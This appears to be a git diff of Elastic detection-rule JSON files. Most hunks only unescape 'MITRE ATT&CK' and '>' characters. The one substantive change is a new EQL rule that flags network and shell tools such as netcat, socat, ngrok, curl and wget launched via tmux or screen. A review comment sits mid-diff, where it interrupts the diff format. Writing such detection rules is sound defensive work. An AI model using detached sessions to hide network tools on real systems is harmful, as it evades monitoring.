b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_105.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json index ae35aa7a583..fbfd10931e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_106.json 
@@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit User Account Management (Success,Failure)\n```\n", + "setup": "\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json index 50bcb45a0b7..8d26aa4a25b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_2.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json
index 1644d2d81d9..4fe007ce720 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_3.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json
index 703632bfc8f..68e50aaa19c 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_4.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json
index 0eda12965cd..a1578fe4d3b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0881d20-54ac-457f-8733-fe0bc5d44c55_5.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json
index 9867b290137..84e071bcd94 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json
index 0b257b2d6df..89077ae681b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json
index 74aa6595001..fab8c5388d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_104.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json
index b371fd3fde8..361e1a4f19b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json
index 53c0a032828..6f0624b34ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_106.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json
index 138d042416c..7e4c13cb391 100644
--- a/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/e08ccd49-0380-4b2b-8d71-8000377d6e49_207.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json
index 4c1c6f76f3b..0804ac58524 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_1.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json
new file mode 100644
index 00000000000..8aace85fa6d
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2.json
@@ -0,0 +1,83 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potentially Suspicious Process Started via tmux or screen",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Rule Type: BBR"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1218",
+ "name": "System Binary Proxy Execution",
+ "reference": "https://attack.mitre.org/techniques/T1218/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json
index 8db8e7d5abf..c5ff69cc22d 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_101.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json
index 8aea88f9653..1dbf10c71b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json
index 0b2f1d62af9..09fc594113e 100644
--- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json
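Review bot: The new rule ships without a `note` investigation guide or a `false_positives` entry, although its `process.name` list (`"python*"`, `"perl"`, `"ruby"`, `"java"`, `"awk"`, `"curl"`, `"wget"`, `"ping"`, `"id"`) covers tools that administrators and developers routinely run inside a screen or tmux session, so an analyst who surfaces this building block has nothing telling them which matches matter. A short `note` stating that the rule is meant for correlation with other alerts on the same host and user, and that a hit should be triaged on the full parent chain and command line rather than the binary name alone, would match the pattern the other rules in this package follow. The description's claim that detached commands "will be executed in the background via its parent process" is only partly reflected in the query, which requires `process.parent.name` to be `screen` or `tmux`; presumably a command launched through an intermediate shell inside the session has that shell as parent and is not matched, which is worth recording in the note as a known coverage limit. Minor style: the first query line carries a trailing space before its newline (`\"start\" and \n`); `\"start\" and\n` keeps the query tidy.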
+++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_102.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json
index 0645c7e7254..0f945c7f26a 100644
--- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json
index 3e0577ca06a..97c0b93d406 100644
--- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json
index 46e349b6d97..75bb57c181f 100644
--- a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_205.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json
index 037680e05a9..36012f82de2 100644
--- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_102.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json
index 4677dc2a8d9..0f7690e87a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json
index 3923a6e1289..1e9b5da8abd 100644
--- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json
index c583df4217b..9bf45ecd2b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_205.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json
index 65e36d412af..ce3493e2643 100644
--- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_102.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json
index d9affb8c038..9511371c004 100644
--- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json
index 36d983d93af..fc305860642 100644
--- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json
index 148b97a22d4..831b5afd7dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_105.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json
index d9c07831ef0..c748a93b0c3 100644
--- a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_106.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json
index 88558465f5a..462783f1857 100644
--- a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json
index f8ef7cab1e4..9ba3c13cd75 100644
--- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_1.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json
index 8b1b95bfd05..7eb8174f34f 100644
--- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_2.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json
index 7e0f1f4760e..fa72ffd1afb 100644
--- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_3.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json
index 2f4109296dc..4f54926dbba 100644
--- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_4.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json
index ef7ac506396..2396228d3cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_5.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json
index ef71985128c..745e18d6410 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26aed74-c816-40d3-a810-48d6fbd8b2fd_102.json
@@ -31,7 +31,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -46,7 +46,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
